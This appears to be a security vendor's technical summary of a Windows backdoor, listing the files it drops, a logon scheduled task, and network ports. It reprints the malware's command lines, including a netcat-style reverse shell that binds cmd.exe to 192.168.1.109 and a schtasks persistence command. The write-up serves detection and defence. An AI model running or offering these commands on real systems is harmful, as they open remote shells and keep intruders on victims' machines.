Technical Information
- <SYSTEM32>\tasks\qqserver
- %ALLUSERSPROFILE%\qqserver.exe
- %ALLUSERSPROFILE%\ncsrv.exe
- %ALLUSERSPROFILE%\tftp.exe
- '<LOCALNET>.1.109':99
- '<LOCALNET>.1.109':98
- '<LOCALNET>.1.109':97
- ClassName: 'AutoHotkey' WindowName: '<Full path to file>'
- ClassName: 'AutoHotkey' WindowName: '%ALLUSERSPROFILE%\ncsrv.exe'
- '%ALLUSERSPROFILE%\ncsrv.exe'
- '%ALLUSERSPROFILE%\qqserver.exe' -t -e cmd.exe 192.168.1.109 90-99 -d
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /tn QQserver /tr %ALLUSERSPROFILE%\ncsrv.exe /sc onlogon (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %ALLUSERSPROFILE%\QQserver.exe -t -e cmd.exe 192.168.1.109 90-99 -d (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /tn QQserver /tr %ALLUSERSPROFILE%\ncsrv.exe /sc onlogon
- '%WINDIR%\syswow64\cmd.exe' /c %ALLUSERSPROFILE%\QQserver.exe -t -e cmd.exe 192.168.1.109 90-99 -d
- '%WINDIR%\syswow64\schtasks.exe' /create /tn QQserver /tr %ALLUSERSPROFILE%\ncsrv.exe /sc onlogon